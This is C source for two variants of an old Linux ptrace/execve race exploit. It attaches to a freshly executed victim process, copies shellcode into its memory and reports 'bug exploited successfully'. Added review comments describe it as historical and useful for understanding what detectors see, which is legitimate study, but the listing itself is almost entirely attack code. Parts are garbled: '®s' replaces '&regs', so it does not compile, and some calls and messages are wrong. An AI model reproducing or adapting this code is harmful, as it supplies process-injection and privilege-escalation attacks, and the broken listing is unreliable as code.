/*
 * Tracer side of a ptrace/execve race demonstration (first variant).
 *
 * Forks a child that runs `filename` via do_victim(), handshakes with it
 * through CS_SIGNAL, attaches with PTRACE_ATTACH, copies `shellcode` into
 * the tracee at its current instruction pointer and detaches.
 *
 * argv[1] (optional): path of the program the child runs; defaults to VICTIM.
 * Returns 0 on success. On any ptrace failure it jumps to `exit`, prints a
 * message, SIGKILLs the child and returns -1. A fork() failure calls exit(-1).
 *
 * NOTE(review): this depends on a historical kernel ptrace-vs-execve race that
 * is not visible from this listing; current kernels also restrict
 * PTRACE_ATTACH further (e.g. Yama ptrace_scope), so the sequence below is of
 * interest mainly for understanding the attach/poke pattern a detector sees.
 */
int main (int argc, char *argv[]) {
    char *filename = VICTIM;
    pid_t victim;
    int error, i;                 /* `error` is declared but never used here */
    struct user_regs_struct regs; /* 32-bit x86 layout: the code reads regs.eip */
    /* take our command args if you wanna play with other progs */
    if (argc > 1) filename = argv[1];
    /* Installed before fork(), so the child inherits the handler as well. */
    signal (CS_SIGNAL, cs_sig_handler);
    victim = fork ();
    if (victim < 0) { perror ("fork: victim"); exit (-1); }
    if (victim == 0) do_victim (filename); /* child path; do_victim is defined elsewhere and assumed not to return — confirm */
    /* Signal handshake: poke the child, then busy-wait on cs_detector, a flag
       defined elsewhere (presumably set by cs_sig_handler — verify it is
       declared volatile/sig_atomic_t, otherwise this spin may be miscompiled). */
    kill (victim, CS_SIGNAL);
    while (!cs_detector);
    /* ptrace() returns nonzero (-1) on failure for every request used here. */
    if (ptrace (PTRACE_ATTACH, victim)) { perror ("ptrace: PTRACE_ATTACH"); goto exit; }
    if (check_execve (victim, filename)) goto exit; /* helper defined elsewhere; nonzero means give up */
    (void) waitpid (victim, NULL, WUNTRACED);      /* wait for the attach stop; result deliberately ignored */
    if (ptrace (PTRACE_CONT, victim, 0, 0)) { perror ("ptrace: PTRACE_CONT"); goto exit; }
    (void) waitpid (victim, NULL, WUNTRACED);      /* wait for the next stop before touching registers */
    /* NOTE(review): `®s` here looks like an extraction artefact of the
       original text; as written the listing does not compile. */
    if (ptrace (PTRACE_GETREGS, victim, 0, ®s)) { perror ("ptrace: PTRACE_GETREGS"); goto exit; }
    /* make sure that last null is in there */
    /* Copies `shellcode` into the tracee one 4-byte word at a time, starting at
       the current eip. NOTE(review): the `<=` bound makes the final iteration
       read the terminating NUL plus up to 3 bytes past the end of `shellcode`
       through the `int *` cast (out-of-bounds/unaligned read); strlen() is also
       re-evaluated every iteration and compared against a signed `i`. */
    for (i = 0; i <= strlen (shellcode); i += 4) {
        if (ptrace (PTRACE_POKETEXT, victim, regs.eip + i, *(int *) (shellcode + i))) { perror ("ptrace: PTRACE_POKETEXT"); goto exit; }
    }
    /* Registers are written back unchanged (nothing in `regs` was modified). */
    if (ptrace (PTRACE_SETREGS, victim, 0, ®s)) { perror ("ptrace: PTRACE_SETREGS"); goto exit; }
    fprintf (stderr, "bug exploited successfully.\nenjoy!\n");
    if (ptrace (PTRACE_DETACH, victim, 0, 0)) { perror ("ptrace: PTRACE_DETACH"); goto exit; }
    (void) waitpid (victim, NULL, 0);              /* reap the child; status ignored */
    return 0;
exit: /* label namespace is separate from the exit() function, so this is legal C */
    fprintf (stderr, "d0h! error!\n");
    kill (victim, SIGKILL);
    return -1;
}
/*
 * Tracer side of a ptrace/execve race demonstration (second variant).
 *
 * Same structure as the first variant: fork a child running `filename`,
 * handshake via CS_SIGNAL, PTRACE_ATTACH, copy `shellcode` into the tracee
 * and detach. Differences: the target address comes from SHELLCODE or argv[2],
 * the copy uses PTRACE_POKEDATA, and the loop bound is `<` instead of `<=`.
 *
 * argv[1] (optional): path of the program the child runs; defaults to VICTIM.
 * argv[2] (optional): hexadecimal address used as the write target; defaults
 *                     to SHELLCODE. Parsed with strtoul(..., 16) and not
 *                     validated (no endptr/errno check).
 * Returns 0 on success; -1 after printing "Error!" and SIGKILLing the child
 * on any ptrace failure. A fork() failure calls exit(-1).
 *
 * NOTE(review): relies on a historical kernel race not visible from this
 * listing; current kernels restrict PTRACE_ATTACH further (e.g. Yama
 * ptrace_scope). Kept here as the attach/poke pattern a detector would see.
 */
int main(int argc, char * argv[]) {
    char * filename=VICTIM;
    pid_t victim;
    int error, i;                 /* `error` is declared but never used here */
    unsigned long eip=SHELLCODE;  /* write target; SHELLCODE is defined elsewhere */
    struct user_regs_struct regs; /* 32-bit x86 layout: the code uses regs.eip */
    if (argc>1) filename=argv[1];
    if (argc>2) eip=strtoul(argv[2], NULL, 16);
    /* Installed before fork(), so the child inherits the handler as well. */
    signal(CS_SIGNAL, cs_sig_handler);
    victim=fork();
    if (victim<0) { perror("fork: victim"); exit(-1); }
    if (victim==0) do_victim(filename); /* child path; do_victim is defined elsewhere and assumed not to return — confirm */
    /* Signal handshake: poke the child, then busy-wait on cs_detector, a flag
       defined elsewhere (presumably set by cs_sig_handler — verify it is
       declared volatile/sig_atomic_t, otherwise this spin may be miscompiled). */
    kill(victim, CS_SIGNAL);
    while (!cs_detector) ;
    /* ptrace() returns nonzero (-1) on failure for every request used here. */
    if (ptrace(PTRACE_ATTACH, victim)) { perror("ptrace: PTRACE_ATTACH"); goto exit; }
    if (check_execve(victim, filename)) goto exit; /* helper defined elsewhere; nonzero means give up */
    (void)waitpid(victim, NULL, WUNTRACED);        /* wait for the attach stop; result deliberately ignored */
    if (ptrace(PTRACE_CONT, victim, 0, 0)) { perror("ptrace: PTRACE_CONT"); goto exit; }
    (void)waitpid(victim, NULL, WUNTRACED);        /* wait for the next stop before touching registers */
    /* NOTE(review): `®s` here looks like an extraction artefact of the
       original text; as written the listing does not compile. */
    if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) { perror("ptrace: PTRACE_GETREGS"); goto exit; }
    regs.eip=eip; /* only the local copy is changed; see the note on the second GETREGS below */
    /* Copies `shellcode` into the tracee one 4-byte word at a time starting at
       `eip`. NOTE(review): strlen() is re-evaluated every iteration and compared
       against a signed `i`; the `int *` cast assumes sizeof(int)==4 and may be
       unaligned. The error message names POKETEXT although the request is
       POKEDATA. */
    for (i=0; i<strlen(shellcode); i+=4) {
        if (ptrace(PTRACE_POKEDATA, victim, regs.eip+i, *(int*)(shellcode+i))) { perror("ptrace: PTRACE_POKETEXT"); goto exit; }
    }
    /* NOTE(review): this is a second PTRACE_GETREGS, not SETREGS, so it reloads
       `regs` from the tracee and the regs.eip assignment above is never written
       back to the tracee in this variant. */
    if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) { perror("ptrace: PTRACE_GETREGS"); goto exit; }
    fprintf(stderr, "Bug exploited successfully.\n");
    /* NOTE(review): the perror text says PTRACE_CONT but this is the DETACH call. */
    if (ptrace(PTRACE_DETACH, victim, 0, 0)) { perror("ptrace: PTRACE_CONT"); goto exit; }
    (void)waitpid(victim, NULL, 0);                /* reap the child; status ignored */
    return 0;
exit: /* label namespace is separate from the exit() function, so this is legal C */
    fprintf(stderr, "Error!\n");
    kill(victim, SIGKILL);
    return -1;
}